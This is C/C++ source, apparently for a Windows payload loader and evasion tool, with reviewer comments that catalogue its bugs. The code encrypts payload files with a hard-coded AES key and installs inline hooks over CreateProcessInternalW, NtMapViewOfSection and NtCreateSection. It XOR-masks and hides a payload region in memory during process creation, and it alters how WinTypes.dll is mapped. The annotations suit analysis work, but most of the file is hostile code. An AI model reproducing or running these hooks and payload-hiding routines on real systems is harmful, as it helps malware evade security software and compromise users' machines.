// page cited above. The `Unknown1`/`Unknown2` fields mark it as a
// reverse-engineered layout; it may not match the OS this is run on --
// verify before reading anything through it. Not referenced by any code
// visible in this view.
typedef struct _SECTION_IMAGE_INFORMATION {
PVOID EntryPoint;
ULONG StackZeroBits;
ULONG StackReserved;
ULONG StackCommit;
ULONG ImageSubsystem;
WORD SubSystemVersionLow;
WORD SubSystemVersionHigh;
ULONG Unknown1;
ULONG ImageCharacteristics;
ULONG ImageMachineType;
ULONG Unknown2[3];
} SECTION_IMAGE_INFORMATION, * PSECTION_IMAGE_INFORMATION;
52 |
53 |
// Information classes for NtQuerySection; values 0 and 1 select the two
// structs above. Not referenced by any code visible in this view.
typedef enum _SECTION_INFORMATION_CLASS {
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;
58 |
// Function TYPE (not a pointer type) for ntdll!NtQuerySection, so a resolved
// address has to be stored as `NtQuerySection *`. Together with
// `#pragma comment(lib,"ntdll.lib")` this suggests a section-query stage was
// planned; no code visible in this view calls it (crypter() is cut off).
typedef NTSYSAPI NTSTATUS NTAPI NtQuerySection(



IN HANDLE SectionHandle,
IN SECTION_INFORMATION_CLASS InformationClass,
OUT PVOID InformationBuffer,
IN ULONG InformationBufferSize,
OUT PULONG ResultLength OPTIONAL);
68 |
69 |
/*
 * encrypter_111 - read the file at `path` and push it through AES-128 via
 * CryptoAPI, 80 bytes at a time, returning the transformed bytes in a
 * malloc'd buffer the caller owns. Silent variant: every failure returns 0
 * without diagnostics (dwStatus / err are assigned and never read).
 *
 * path       input file. Rejected (returns 0) if longer than MAX_PATH.
 * isDecrypt  TRUE -> CryptDecrypt, FALSE -> CryptEncrypt. Nothing is written
 *            to disk in either mode: the hOutFile / WriteFile code is
 *            commented out, so filename2 is built and never used.
 * bytes      out-param set to GetFileSize() of the input -- the INPUT length,
 *            not the output length. On decrypt the final block loses its
 *            padding, so the tail of the returned buffer (up to 15 bytes) is
 *            uninitialised heap; on encrypt the output is longer.
 * calculate  TRUE -> only report the size through *bytes and return 0.
 *
 * Returns the buffer, or 0 on failure. A CryptDecrypt/CryptEncrypt failure
 * inside the loop only `break`s, so a half-transformed buffer is returned
 * with no error signal to the caller.
 *
 * Resource handling, as written:
 *  - Every early return after CreateFileA succeeds (AcquireContext,
 *    CreateHash, HashData, DeriveKey, malloc) leaks hInpFile and whatever
 *    CryptoAPI handles exist at that point.
 *  - On the happy path hProv is released before hKey/hHash are destroyed;
 *    the documented order is key and hash first, then the provider.
 *  - filename2 is 260+6 bytes, so a `path` of exactly MAX_PATH characters
 *    leaves no room for the terminator and strcat_s rejects it.
 *
 * Crypto notes (for anyone analysing the .ramon blobs):
 *  - Key material is hard-coded. CryptDeriveKey(CALG_AES_128) is fed a
 *    SHA-256 hash of the key string, but `len` is the wide-char count from
 *    lstrlenW while CryptHashData takes a byte count, so only the first 15
 *    bytes of the 30-byte UTF-16 string are hashed. Anyone holding this
 *    source can decrypt the payloads shipped alongside it.
 *  - Encrypt mode: CryptEncrypt is told the buffer holds chunk_size (80)
 *    bytes, so a full final chunk has no room for padding and the call fails;
 *    a partial final chunk grows by up to 16 bytes while the output buffer is
 *    only inputSize+1 bytes, so the memcpy at 80*i can write past its end.
 *  - The 80*i destination offset assumes every non-final ReadFile returned a
 *    full 80-byte chunk; the code never tracks the bytes actually produced.
 */
char* encrypter_111(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate)
{
if (strlen(path) > MAX_PATH)
return 0;
char filename[266];
char filename2[260 + 6];
if (!isDecrypt)
{
// Encrypt mode: output name = input name + ".ramon" (never opened, see below).
strcpy_s(filename, 266, path);
strcpy_s(filename2, 266, path);
strcat_s(filename2, 266, extension);

}
else
{
strcpy_s(filename, 266, path);
}


// Hard-coded key string; `len` is a CHARACTER count (see header note).
wchar_t default_key[] = L"7fwivcli7r#auzS";
wchar_t* key_str = default_key;

size_t len = lstrlenW(key_str);


HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
if (hInpFile == INVALID_HANDLE_VALUE) {

return 0;
}

/*HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOutFile == INVALID_HANDLE_VALUE) {
printf("Cannot open output file!\n");
system("pause");
return 0;
}*/



DWORD dwStatus = 0;
BOOL bResult = FALSE;
wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
HCRYPTPROV hProv;

// CRYPT_VERIFYCONTEXT: ephemeral provider handle, no persistent key container.
if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
dwStatus = GetLastError();
return 0; // hInpFile leaks
}



HCRYPTHASH hHash;
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
dwStatus = GetLastError();

return 0; // hInpFile, hProv leak
}

// Byte count = `len` (15), i.e. half of the UTF-16 key string.
if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
DWORD err = GetLastError();

return 0; // hInpFile, hProv, hHash leak
}

HCRYPTKEY hKey;
if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
dwStatus = GetLastError();

return 0; // hInpFile, hProv, hHash leak
}


const size_t chunk_size = CHUNK_SIZE;
BYTE chunk[chunk_size] = { 0 };
DWORD out_len = 0;

BOOL isFinal = FALSE;
DWORD readTotalSize = 0;
DWORD inputSize = GetFileSize(hInpFile, NULL);
*bytes = inputSize;
// Size-only query: report the input length, tear everything down, return 0.
if (calculate == TRUE)
{

CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
//memset(random, '\0', 16);
CloseHandle(hInpFile);
/*if (!isDecrypt)
CloseHandle(hOutFile);*/
return 0;
}

// Output buffer sized to the INPUT length (+1). See header for the
// encrypt-mode overflow and the uninitialised tail in decrypt mode.
char* kaka = (char*)malloc(inputSize + 1);
if (!kaka)
return 0; // hInpFile, hProv, hHash, hKey leak
int i = 0;
while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
if (0 == out_len) {
break;
}
readTotalSize += out_len;
// Final chunk: lets CryptoAPI strip (decrypt) or add (encrypt) the padding.
if (readTotalSize == inputSize) {
isFinal = TRUE;
}

if (isDecrypt) {
if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
break; // falls through to `return kaka` with a partial buffer
}
}
else {
// dwBufLen == chunk_size leaves no room for padding on a full final chunk.
if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
break;
}
}
DWORD written = 0; // only used by the commented-out WriteFile path

// Destination offset assumes each previous chunk produced exactly 80 bytes.
if (i != 0)
memcpy(kaka + 80 * i, chunk, out_len);
else
{
memcpy(kaka, chunk, out_len);

}
i++;

/*if (!isDecrypt)
{
if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
printf("writing failed!\n");
break;
}
}*/
// Plain memset before the next read; not a guaranteed secret wipe.
memset(chunk, 0, chunk_size);
}
*bytes = inputSize;
// Provider released before the objects derived from it are destroyed.
CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
//memset(random, '\0', 16);
CloseHandle(hInpFile);
/*if (!isDecrypt)
CloseHandle(hOutFile);
if (isDecrypt == FALSE)
{
HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
CloseHandle(hInpFile);
}*/


return kaka;





}
231 |
232 |
233 |
234 |
235 |
236 |
237 |
/*
 * crypter - rewrite the file at `path` in place (an 8-byte prefix is put in
 * front of its contents), then stream the rewritten file through CryptoAPI
 * AES-128 into "<path><extension>" (`extension` is a file-scope string
 * defined outside this block).
 *
 *   path       input file; rejected (returns 0) if longer than MAX_PATH.
 *   isDecrypt  FALSE: CryptEncrypt each chunk and write it to the output file.
 *              TRUE:  CryptDecrypt each chunk; the result is written nowhere.
 *              NOTE(review): filename2 is only initialised in the !isDecrypt
 *              branch, yet it is passed to CreateFileA in both modes.
 *   bytes      out: GetFileSize() of the input *after* the in-place rewrite.
 *   calculate  TRUE: report the size only, release every handle, return 0.
 *
 * Returns a malloc()ed buffer of inputSize + 1 bytes (caller frees), or 0 on
 * failure. NOTE(review): nothing in this function ever writes into that
 * buffer; processed data goes to hOutFile only.
 *
 * Review notes on defects visible here (code left unchanged):
 *  - every early `return 0` after a resource was acquired leaks it
 *    (hInpFile, hOutFile, hProv, hHash, hKey); there is no single cleanup path.
 *  - fopen(path, "wb+") and malloc(sz) are unchecked; a failed reopen
 *    dereferences a null FILE* in the fwrite calls.
 *  - `len` is a wide-character count but CryptHashData receives it as a byte
 *    count, so only the first `len` bytes of the UTF-16 key string are hashed.
 *  - the key material is a compile-time constant embedded in the binary.
 */
char* crypter(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate)
{
    if (strlen(path) > MAX_PATH)
        return 0;
    char filename[266];
    char filename2[260 + 6];
    if (!isDecrypt)
    {
        // Input name, and output name = input name + extension.
        strcpy_s(filename, 266, path);
        strcpy_s(filename2, 266, path);
        strcat_s(filename2, 266, extension);

    }
    else
    {
        strcpy_s(filename, 266, path);   // filename2 stays uninitialised here
    }

    // Hard-coded password; SHA-256 of (part of) it becomes the AES-128 key.
    wchar_t default_key[] = L"7fwivcli7r#auzS";
    wchar_t* key_str = default_key;

    size_t len = lstrlenW(key_str);      // characters, not bytes (see header note)
    FILE* fp = fopen(path, "rb");
    if (!fp)
    {
        printf("Error\n");
        return 0;
    }
    // Read the whole file, then rewrite it with the 8-byte prefix in front.
    fseek(fp, 0L, SEEK_END);
    size_t sz = ftell(fp);
    rewind(fp);
    char* buf = (char*)malloc(sz);                 // unchecked
    int charsTransferred = fread(buf, 1, sz, fp);  // result never used
    fclose(fp);
    fp = fopen(path, "wb+");                       // unchecked: NULL on failure
    const char* aux = "\x41\x41\x41\x41\x90\x90\x90\x90";
    fwrite(aux, 8, 1, fp);
    fwrite(buf, 1, sz, fp);
    fclose(fp);
    free(buf);

    HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);

    if (hInpFile == INVALID_HANDLE_VALUE) {

        return 0;
    }

    // Opened in both modes; only written to when encrypting.
    HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hOutFile == INVALID_HANDLE_VALUE) {

        return 0;                         // leaks hInpFile
    }

    DWORD dwStatus = 0;                   // assigned on errors, never read
    BOOL bResult = FALSE;
    wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
    HCRYPTPROV hProv;

    if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        dwStatus = GetLastError();

        return 0;
    }

    HCRYPTHASH hHash;
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
        dwStatus = GetLastError();

        return 0;
    }

    if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
        DWORD err = GetLastError();

        return 0;
    }

    HCRYPTKEY hKey;
    if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
        dwStatus = GetLastError();

        return 0;
    }

    // NOTE(review): the array bound is a const variable, i.e. a VLA, which is
    // not standard C++. CHUNK_SIZE is a macro defined outside this block.
    const size_t chunk_size = CHUNK_SIZE;
    BYTE chunk[chunk_size] = { 0 };
    DWORD out_len = 0;

    BOOL isFinal = FALSE;
    DWORD readTotalSize = 0;
    DWORD inputSize = GetFileSize(hInpFile, NULL);
    *bytes = inputSize;
    if (calculate == TRUE)
    {
        // Size-only query: the one path that releases everything it acquired.
        CryptReleaseContext(hProv, 0);
        CryptDestroyKey(hKey);
        CryptDestroyHash(hHash);
        CloseHandle(hInpFile);
        if (!isDecrypt)
            CloseHandle(hOutFile);
        return 0;
    }

    char* kaka = (char*)malloc(inputSize + 1);   // returned to caller, never filled
    if (!kaka)
        return 0;                                // leaks all handles above
    int i = 0;                                   // unused
    // Chunked pass over the input. isFinal asks CryptoAPI to pad the last
    // block. Any CryptoAPI or WriteFile failure silently ends the loop.
    // NOTE(review): on the final block CryptEncrypt needs room for padding
    // beyond out_len; when the last read fills the whole chunk the call can
    // fail and the `break` drops that block without any error - confirm.
    while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
        if (0 == out_len) {
            break;
        }
        readTotalSize += out_len;
        if (readTotalSize == inputSize) {
            isFinal = TRUE;
        }

        if (isDecrypt) {
            if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
                break;
            }
        }
        else {
            if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
                break;
            }
        }
        DWORD written = 0;

        if (!isDecrypt)
        {
            if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
                break;
            }
        }
        memset(chunk, 0, chunk_size);
    }
    *bytes = inputSize;
    CryptReleaseContext(hProv, 0);
    CryptDestroyKey(hKey);
    CryptDestroyHash(hHash);
    CloseHandle(hInpFile);
    if (!isDecrypt)
        CloseHandle(hOutFile);   // in decrypt mode hOutFile is never closed

    return kaka;
}
402 |
403 |
404 |
405 |
406 |
407 |
// Function-pointer type for the undocumented kernelbase!CreateProcessInternalW.
// Its 12-parameter shape is what every hook/restore helper below forwards.
typedef
BOOL(WINAPI* PCreateProcessInternalW)(
    HANDLE hToken,
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation,
    PHANDLE hNewToken
    );

// Function-pointer type for ntdll!NtMapViewOfSection.
typedef NTSTATUS(NTAPI* myNtMapViewOfSection)
(HANDLE SectionHandle,
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect);

// 13-byte inline-hook stubs, one per patched export. Bytes [2..9] hold an
// absolute 64-bit target and are filled at run time by the hook_* functions
// (memcpy(&tramp[2], &fn, sizeof fn)); the matching *_old arrays receive the
// export's original 13 bytes so the restore_* functions can write them back.
// Analyst note: while a hook is live the export begins with
// `mov r10, imm64 / jmp r10` instead of its normal prologue.
char tramp[13] = {                                                   // CreateProcessInternalW -> hook_CreateProcessA
    0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
    0x41, 0xFF, 0xE2                                            // jmp r10
};
char tramp_old[13];

char tramp2[13] = {                                                  // NtMapViewOfSection -> null_function
    0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
    0x41, 0xFF, 0xE2                                            // jmp r10
};
char tramp2_old[13];

char tramp_ntcreatesection[13] = {                                   // NtCreateSection -> ntCreateMySection
    0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
    0x41, 0xFF, 0xE2                                            // jmp r10
};
char tramp_old_ntcreatesection[13];
464 |
465 |
/*
 * restore_function - temporarily unhook CreateProcessInternalW and call the
 * original with the forwarded arguments.
 *
 * Writes the saved 13 bytes (tramp_old) back over the export, then calls it.
 * Returns FALSE on WriteProcessMemory failure - and also FALSE on success: the
 * `return TRUE` at the end is unreachable, and the real function's BOOL result
 * is discarded, so no caller can tell whether the process was created.
 *
 * Review notes (left unchanged):
 *  - hProc from OpenProcess(PROCESS_ALL_ACCESS on the current process) is
 *    never closed.
 *  - `sizeof CreateProcessInternalW` is the size of the pointer variable, not
 *    of the 13-byte patch; it only works because VirtualProtect is
 *    page-granular.
 *  - GetModuleHandle/GetProcAddress/VirtualProtect results are unchecked.
 */
BOOL restore_function(HANDLE hToken,
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation,
    PHANDLE hNewToken)
{
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
    PCreateProcessInternalW CreateProcessInternalW;
    CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("kernelbase.dll"), "CreateProcessInternalW");

    DWORD written2,wt3;

    // Make both the export's page and the saved-bytes array writable+executable.
    VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);
    VirtualProtect(tramp_old, sizeof tramp_old, PAGE_EXECUTE_READWRITE, &wt3);

    //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
    //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
    // Put the original prologue back so the call below runs the real code.
    if (!WriteProcessMemory(hProc, CreateProcessInternalW, &tramp_old, sizeof tramp_old, NULL))
    {

        return FALSE;
    }
    CreateProcessInternalW(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags,
        lpEnvironment,
        lpCurrentDirectory,
        lpStartupInfo,
        lpProcessInformation,
        hNewToken);
    return FALSE;   // unconditional; the TRUE below is unreachable



    return TRUE;
}
508 |
509 |
/*
 * restore_ntmap - write the saved bytes (tramp2_old) back over
 * ntdll!NtMapViewOfSection and call the real function with the forwarded
 * arguments.
 *
 * Returns FALSE if the unpatch write fails, otherwise 1. The NTSTATUS of the
 * real call is discarded, so the caller never learns whether the map
 * succeeded. hProc (PROCESS_ALL_ACCESS on the current process) is never
 * closed; `sizeof NtMap` is pointer-sized, not 13 bytes; VirtualProtect and
 * GetProcAddress results are unchecked.
 */
BOOL restore_ntmap(HANDLE SectionHandle,
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect)
{
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
    myNtMapViewOfSection NtMap;
    NtMap = (myNtMapViewOfSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtMapViewOfSection");
    DWORD written2, written3;


    VirtualProtect(NtMap, sizeof NtMap, PAGE_EXECUTE_READWRITE, &written2);
    VirtualProtect(tramp2_old, sizeof tramp2_old, PAGE_EXECUTE_READWRITE, &written3);

    //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
    //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
    // Restore the original prologue, then call through to the real export.
    if (!WriteProcessMemory(hProc, NtMap, &tramp2_old, sizeof tramp2_old, NULL))
    {
        return FALSE;
    }
    NtMap(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
    return 1;

}
540 |
541 |
/*
 * restore_createprocess_hooks - round trip: unhook and run the original
 * CreateProcessInternalW via restore_function(), then re-install the 13-byte
 * `tramp` stub over the export.
 *
 * Returns FALSE only if re-writing the stub fails. restore_function()'s
 * result is ignored (it always returns FALSE, see above), so a failed
 * unhook or call is not reported. hProc is never closed; VirtualProtect
 * results are unchecked. The module name is spelled "KERNELBASE.dll" here and
 * "kernelbase.dll" in restore_function(); module-name lookup is
 * case-insensitive, so this is only an inconsistency.
 */
BOOL restore_createprocess_hooks(
    HANDLE hToken,
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation,
    PHANDLE hNewToken)
{
    restore_function(hToken,
        lpApplicationName,
        lpCommandLine,
        lpProcessAttributes,
        lpThreadAttributes,
        bInheritHandles,
        dwCreationFlags,
        lpEnvironment,
        lpCurrentDirectory,
        lpStartupInfo,
        lpProcessInformation,
        hNewToken);
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
    PCreateProcessInternalW CreateProcessInternalW;
    CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("KERNELBASE.dll"), "CreateProcessInternalW");
    DWORD written2;

    VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);
    DWORD old2;
    VirtualProtect(tramp, sizeof tramp, PAGE_EXECUTE_READWRITE, &old2);
    // Re-arm the hook (tramp already carries the target address).
    if (!WriteProcessMemory(hProc, (LPVOID*)CreateProcessInternalW, &tramp, sizeof tramp, NULL))
    {
        return FALSE;
    }
    return TRUE;
}
582 |
/*
 * hook_CreateProcessA - replacement installed over CreateProcessInternalW
 * (despite the name it has the InternalW signature).
 *
 * Around the real call it XORs the global payload region
 * [offset, offset + size_offset) with a repeating key and marks it
 * PAGE_NOACCESS, calls restore_createprocess_hooks() (unhook -> real call
 * -> re-hook), sleeps 5 s, restores the old protection and XORs the region
 * back. `offset` and `size_offset` are file-scope globals set in main().
 *
 * Review notes (left unchanged):
 *  - `key_size = sizeof key` is the size of a `const char*`, not strlen(key),
 *    so only the first pointer-size bytes of the key string are ever used
 *    (same defect in null_function()).
 *  - the function is declared BOOL but falls off the end without a return
 *    statement: undefined behaviour, and the caller of CreateProcess*
 *    receives an arbitrary value.
 *  - `VirtualProtect(offset, size_offset, old, &old)` uses `old` as both
 *    input and output; VirtualProtect results are unchecked.
 *  - hHeaps, mask and ii are unused; `_int64` (single underscore) in the loop
 *    conditions presumably relies on an MSVC synonym for __int64 - confirm.
 *  - the XOR passes write through raw integer-to-pointer casts; nothing here
 *    checks that the region is writable at that moment.
 */
BOOL WINAPI hook_CreateProcessA(
    HANDLE hToken,
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation,
    PHANDLE hNewToken
)
{
    HANDLE hHeaps[250];                       // unused
    const char* mask = "MZE";                 // unused
    const char* key = "ASDFASF234124jklsf-4&%/&/";
    size_t key_size = sizeof key;             // pointer size, not strlen(key)
    __int64 ii = (__int64)offset;             // unused
    int keyIndex = 0;
    // XOR pass 1 over the payload region (byte by byte).
    for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
    {
        *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
        keyIndex += 1;
    }

    DWORD old;
    VirtualProtect(offset, size_offset, PAGE_NOACCESS, &old);

    if (restore_createprocess_hooks(hToken,
        lpApplicationName,
        lpCommandLine,
        lpProcessAttributes,
        lpThreadAttributes,
        bInheritHandles,
        dwCreationFlags,
        lpEnvironment,
        lpCurrentDirectory,
        lpStartupInfo,
        lpProcessInformation,
        hNewToken) == FALSE)
    {
        return 0;   // region left PAGE_NOACCESS and XOR-encoded on this path
    }
    Sleep(5000);

    VirtualProtect(offset, size_offset, old, &old);

    // XOR pass 2: same key sequence, restores the original bytes.
    keyIndex = 0;
    for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
    {
        *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
        keyIndex += 1;

    }

    // NOTE(review): no return statement here (BOOL function).
}
642 |
643 |
// Function-pointer alias for ntdll!NtCreateSection (C++11 `using` alias; the
// IN/OUT/OPTIONAL words are SAL annotation macros). `PageAttributess` is a
// misspelling carried consistently through the declarations below.
using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);


// Forward declarations: the NtCreateSection replacement and its
// unhook/call/re-hook helper, which call each other.
NTSTATUS ntCreateMySection (OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
649 |
/*
 * ntCreateMySection - replacement installed over NtCreateSection.
 *
 * When FileHandle is non-NULL, resolves its path; if the path contains
 * "WinTypes.dll" the SectionAttributes argument is overridden with
 * SEC_IMAGE_NO_EXECUTE before the real NtCreateSection is reached via
 * restore_hook_ntcreatesection() (unhook -> call -> re-hook).
 *
 * Returns the constant 1, never the real NTSTATUS: 1 is not STATUS_SUCCESS
 * (0) although NT_SUCCESS() treats it as success, and any failure of the
 * underlying call is hidden from the caller.
 *
 * Review notes (left unchanged):
 *  - per the API contract GetFinalPathNameByHandleA returns the required
 *    size (non-zero) when the 256-byte buffer is too small and the buffer
 *    content is then unspecified; the `else` branch runs strstr() on it
 *    anyway.
 *  - printf("%d") with the DWORD from GetLastError() mismatches the format.
 *  - isFinal is set but never read.
 */
NTSTATUS ntCreateMySection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL)
{
    int isFinal = 0;                          // written, never read
    char lpFilename[256];
    if (FileHandle != NULL)
    {

        DWORD res = GetFinalPathNameByHandleA(FileHandle, lpFilename, 256, FILE_NAME_OPENED | VOLUME_NAME_DOS);
        if (res == 0)
            printf("GetFinalPathNameByHandleA error: %d\n", GetLastError());

        else
        {
            // Only this one backing file gets its section attributes rewritten.
            if (strstr(lpFilename, "WinTypes.dll") != 0)
            {
                isFinal = 1;
                SectionAttributes = SEC_IMAGE_NO_EXECUTE;

            }
        }
    }
    restore_hook_ntcreatesection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle);
    return 1;   // real NTSTATUS is lost (see header)
}
674 |
675 |
// Forward declaration: (re)installs the NtCreateSection stub; defined below.
BOOL hook_ntcreatesection(HANDLE hProc);
/*
 * restore_hook_ntcreatesection - write the saved bytes back over
 * ntdll!NtCreateSection, call the real function with the forwarded
 * arguments, then re-install the stub via hook_ntcreatesection().
 *
 * Returns FALSE if the unpatch write fails, otherwise 1. The NTSTATUS of the
 * real NtCreateSection is discarded, so ntCreateMySection never learns the
 * outcome. hProc (PROCESS_ALL_ACCESS on the current process) is never
 * closed; `sizeof NtCreate` is pointer-sized, not 13 bytes; VirtualProtect
 * and GetProcAddress results are unchecked.
 */
BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL)
{
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
    myNtCreateSection NtCreate;
    NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection");
    DWORD written2, written3;


    VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written2);
    VirtualProtect(tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, PAGE_EXECUTE_READWRITE, &written3);

    //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
    //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
    // Restore the original prologue, call through, then re-arm the hook.
